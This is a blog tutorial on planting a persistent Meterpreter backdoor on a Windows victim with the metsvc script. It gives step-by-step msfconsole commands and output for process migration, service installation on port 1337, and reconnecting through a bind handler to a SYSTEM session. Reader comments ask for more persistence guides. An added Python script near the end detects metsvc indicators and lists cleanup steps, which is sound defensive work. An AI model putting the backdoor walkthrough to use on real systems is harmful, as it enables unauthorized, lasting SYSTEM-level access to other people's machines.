Meterpreter Backdoor

July 14, 2015


This backdoor is built with the Meterpreter script metsvc. metsvc installs Meterpreter on the victim's machine as a Windows service, so that you can reconnect to the host later, even after a reboot, without having to exploit it again.

To get the script, go to: http://www.phreedom.org/software/metsvc/

Ok, now I assume you have downloaded the script and configured msfconsole to use it.

Let’s start…

Once we have a Meterpreter session open in Metasploit, we list the running processes by typing ps:


meterpreter > ps

It prints every running process together with its PID, e.g.:

001 explorer.exe
002 notepad.exe

etc.

Pick a stable, long-lived process such as explorer.exe and move the session into it, so that it survives if the process we originally exploited exits. Type migrate followed by the PID (001 for explorer in the listing above):

meterpreter > migrate 001
[*] Migrating to 001...
[*] Migration completed successfully.

We need to start metsvc:

meterpreter > run metsvc
[*] Creating a meterpreter service on port 1337
[*] Creating a temporary installation directory C:\DOCUME~1\Thinker\LOCALS~1\Temp\ClTpasVnksh...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
[*]      * Installing service metsvc
[*]      * Starting service
[*]      Service metsvc successfully installed.

For help, you can see additional options by typing:

meterpreter > run metsvc -h
[*]
OPTIONS:

-A        Automatically start a matching multi/handler to connect to the service
-h        This help menu
-r        Uninstall an existing Meterpreter service (files must be deleted manually)

To get back in, we start a handler on the attacker's side with the windows/metsvc_bind_tcp payload: the service on the victim is the listening side, and our handler connects to it. Be aware that the metsvc service accepts whoever connects first, with no authentication of any kind, so anyone who can reach that port gets a SYSTEM-level Meterpreter session. Treat it as a real hole in the host and remove it (run metsvc -r, then delete the uploaded files) when you are done with it.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp

For a bind payload, LPORT is the port the service on the victim is listening on, which is the port metsvc reported when it installed (1337 above):

msf exploit(handler) > set LPORT 1337
LPORT => 1337

RHOST is the victim's IP address. The address below is a placeholder; substitute the address of the machine you installed metsvc on:

msf exploit(handler) > set RHOST 192.168.1.0
RHOST => 192.168.1.0

Check that the payload options match the service before running the handler:

msf exploit(handler) > show options

Module options:

Name  Current Setting  Required  Description
----  ---------------  --------  -----------


Payload options (windows/metsvc_bind_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LPORT     1337            yes       The local port
RHOST     192.168.1.0    no        The target address


Exploit target:

Id  Name
--  ----
0   Wildcard Target


At last, fire:

msf exploit(handler) > exploit

We have a fresh session on the box. Because metsvc runs as a Windows service, this session runs as SYSTEM rather than as the user we originally compromised, and the service will come back after a reboot:

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > getuid
Server username: Thinker\SYSTEM
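The same output that tells the attacker the backdoor is in place tells a defender what to look for: a service named metsvc, the files metsvc.exe, metsvc-server.exe and metsrv.dll dropped under a Temp directory, and a TCP listener on the chosen port. The script below is an added example, not code from the tutorial, that checks a host inventory for those indicators. It reads two constructed samples: service records in the CSV layout printed by `wmic service get Name,PathName,StartMode,State /format:csv` (WMIC prepends a Node column) and socket lines in the layout printed by `netstat -ano`. Those layouts, the sample hostname, user and path, and the "service binary under a Temp directory" heuristic are assumptions made for the example; the ports checked are the tutorial's 1337 and 31337. Because `run metsvc -r` leaves the uploaded files in place, each finding carries the cleanup step that goes with it.

```python
"""Spot a metsvc-style Meterpreter service on a Windows host from inventory text.

Added example, not code from the original tutorial. Input layouts (WMIC CSV
and `netstat -ano`) and all sample data are assumptions made for the example.
"""
import csv
import io
import ntpath
import re
from dataclasses import dataclass
from typing import List

# Service name and files named in the tutorial's `run metsvc` output.
METSVC_SERVICE = "metsvc"
METSVC_FILES = {"metsvc.exe", "metsvc-server.exe", "metsrv.dll"}
# Port from the tutorial plus the other port commonly used with metsvc.
SUSPECT_PORTS = {1337, 31337}

# Constructed sample: WMIC CSV layout, hostname/user/path are made up.
SAMPLE_SERVICES = r"""Node,Name,PathName,StartMode,State
THINKER,Spooler,C:\WINDOWS\system32\spoolsv.exe,Auto,Running
THINKER,metsvc,"C:\DOCUME~1\Thinker\LOCALS~1\Temp\ClTpasVnksh\metsvc.exe",Auto,Running
THINKER,wuauserv,C:\WINDOWS\system32\svchost.exe -k netsvcs,Auto,Running
"""

# Constructed sample: `netstat -ano` layout, PIDs are made up.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:1337           0.0.0.0:0              LISTENING       1724
  TCP    192.168.1.5:139        0.0.0.0:0              LISTENING       4
"""


@dataclass(frozen=True)
class Finding:
    kind: str     # "service" or "listener"
    detail: str
    cleanup: str  # `run metsvc -r` stops the service but leaves the files behind


def service_binary(pathname: str) -> str:
    """Strip surrounding quotes and arguments from a service PathName, leaving the image path."""
    m = re.match(r'\s*"?(.*?\.(?:exe|dll))"?', pathname, re.IGNORECASE)
    return m.group(1) if m else pathname.strip()


def scan_services(csv_text: str) -> List[Finding]:
    """Flag the metsvc service, its known binaries, and any service run from a Temp directory."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        name = row["Name"]
        binary = service_binary(row["PathName"])
        basename = ntpath.basename(binary).lower()
        if name.lower() == METSVC_SERVICE or basename in METSVC_FILES:
            findings.append(Finding(
                "service",
                f"{name} -> {binary}",
                f"sc stop {name} && sc delete {name}; then delete {ntpath.dirname(binary)}",
            ))
        elif "\\temp\\" in binary.lower():
            # Heuristic (assumption): legitimate services rarely live in Temp.
            findings.append(Finding(
                "service",
                f"{name} runs from a Temp directory: {binary}",
                "review before removing",
            ))
    return findings


def scan_listeners(netstat_text: str, ports=SUSPECT_PORTS) -> List[Finding]:
    """Flag TCP listeners on the ports a metsvc bind handler would connect to."""
    findings = []
    for line in netstat_text.splitlines():
        parts = line.split()
        # Columns: Proto, Local Address, Foreign Address, State, PID
        if len(parts) < 5 or parts[0] != "TCP" or parts[3] != "LISTENING":
            continue
        port = int(parts[1].rsplit(":", 1)[1])
        if port in ports:
            findings.append(Finding(
                "listener",
                f"TCP port {port} listening (PID {parts[4]})",
                f"confirm PID {parts[4]} belongs to the flagged service before killing it",
            ))
    return findings


def scan(csv_text: str, netstat_text: str) -> List[Finding]:
    """Combine both checks; an empty list means no metsvc indicators were seen."""
    return scan_services(csv_text) + scan_listeners(netstat_text)


if __name__ == "__main__":
    for f in scan(SAMPLE_SERVICES, SAMPLE_NETSTAT):
        print(f"[{f.kind}] {f.detail}\n    cleanup: {f.cleanup}")
```

On a real host, feed it the output of the two commands named in the lead-in instead of the samples. Matching on the port alone is the weakest of the three checks, since the attacker picks the port; the service name and the dropped filenames are the indicators worth keying a detection on, and the Temp-directory heuristic catches a renamed copy.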

Thanks and stay tuned for more.

— Multi Thinker

3 Comments
  1. The thing you told me to download in the first part of this is picked up as spyware by Iceweasel, but I don't care because this is a VM. Could you please describe how I download it a little better? I have the files, but the website you sent me to doesn't explain how to get it well, so can someone please reply and help me understand. Thank you, and sorry, I am a noob.

    But overall, great guide, mate.

  2. Thanks for this very nice tutorial 😀. Please make one on persistence backdooring and how to do it in Windows 7 and 8. Thanks 🙂 again.
